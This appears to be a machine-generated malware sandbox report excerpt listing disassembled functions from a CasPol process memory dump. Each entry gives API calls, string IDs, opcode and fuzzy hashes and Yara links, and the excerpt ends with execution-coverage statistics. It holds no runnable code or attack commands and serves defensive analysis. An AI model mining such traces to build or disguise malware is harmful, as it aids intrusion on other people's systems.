                                                                                                                                                                                  • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                                                                                  • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                                                  • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1386444988-0
                                                                                                                                                                                  • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                  • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                                                                  • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                  • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                                                                  Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InvalidateMessageRectSend
                                                                                                                                                                                  • String ID: d=E
                                                                                                                                                                                  • API String ID: 909852535-3703654223
                                                                                                                                                                                  • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                                                  • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                                                                                                  • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                                                                                                  Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                                                  • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                                                    • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                                                    • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: wcschr$memcpywcslen
                                                                                                                                                                                  • String ID: "
                                                                                                                                                                                  • API String ID: 1983396471-123907689
                                                                                                                                                                                  • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                  • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                                                                  • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                                                                  Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                  • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                                                  • String ID: URL
                                                                                                                                                                                  • API String ID: 2108176848-3574463123
                                                                                                                                                                                  • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                  • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                  • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                                                                                                  Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _snwprintfmemcpy
                                                                                                                                                                                  • String ID: %2.2X
                                                                                                                                                                                  • API String ID: 2789212964-323797159
                                                                                                                                                                                  • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                  • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                  • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                                                  Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _snwprintf
                                                                                                                                                                                  • String ID: %%-%d.%ds
                                                                                                                                                                                  • API String ID: 3988819677-2008345750
                                                                                                                                                                                  • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                                  • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                                                                                  • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                                  • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                                                                                  Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040E770
                                                                                                                                                                                  • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSendmemset
                                                                                                                                                                                  • String ID: F^@
                                                                                                                                                                                  • API String ID: 568519121-3652327722
                                                                                                                                                                                  • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                  • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                                                                  • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                  • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                                                                  Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: PlacementWindowmemset
                                                                                                                                                                                  • String ID: WinPos
                                                                                                                                                                                  • API String ID: 4036792311-2823255486
                                                                                                                                                                                  • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                  • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                  • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                                                                                  Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??3@DeleteObject
                                                                                                                                                                                  • String ID: r!A
                                                                                                                                                                                  • API String ID: 1103273653-628097481
                                                                                                                                                                                  • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                  • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                                                  Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                  • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                                                                                  • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                                  • String ID: _lng.ini
                                                                                                                                                                                  • API String ID: 383090722-1948609170
                                                                                                                                                                                  • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                                                  • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                                                                                  • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                                                  • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                                                                                  Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                                                                                                  • memset.MSVCRT ref: 0042BAAE
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$memset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 438689982-0
                                                                                                                                                                                  • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                                  • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                                                                                  • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                                                                                  Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@$memset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1860491036-0
                                                                                                                                                                                  • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                  • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                                                                                  • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                                                                                  Function 0040A8D0 Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                    • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                  • free.MSVCRT ref: 0040A908
                                                                                                                                                                                  • free.MSVCRT ref: 0040A92B
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 726966127-0
                                                                                                                                                                                  • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                                                                                                  • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                                                                                  • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                                                                                                  • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                                                                                  Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                                                  • free.MSVCRT ref: 0040B201
                                                                                                                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                    • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                  • free.MSVCRT ref: 0040B224
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 726966127-0
                                                                                                                                                                                  • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                                                                                                  • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                                                                  Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcmp.MSVCRT ref: 00408AF3
                                                                                                                                                                                    • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                                                                                                                                                    • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                                                                                                    • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                                                                                                  • memcmp.MSVCRT ref: 00408B2B
                                                                                                                                                                                  • memcmp.MSVCRT ref: 00408B5C
                                                                                                                                                                                  • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcmp$memcpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 231171946-0
                                                                                                                                                                                  • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                  • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                                                                                  • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                                                                                  Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                                  • free.MSVCRT ref: 0040B0FB
                                                                                                                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                    • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                  • free.MSVCRT ref: 0040B12C
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3669619086-0
                                                                                                                                                                                  • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                                                                                  • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                                                                                  • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                                                                  Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                                                  • malloc.MSVCRT ref: 00417407
                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                                                  • free.MSVCRT ref: 00417425
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2605342592-0
                                                                                                                                                                                  • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                                                                                  • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                                                  • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                                                                                  • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                                                                                  Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: wcslen$wcscat$wcscpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1961120804-0
                                                                                                                                                                                  • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                  • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                                                                                  • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                  Execution Coverage:3%
                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:22.9%
                                                                                                                                                                                  Signature Coverage:0.5%
                                                                                                                                                                                  Total number of Nodes:969
                                                                                                                                                                                  Total number of Limit Nodes:16
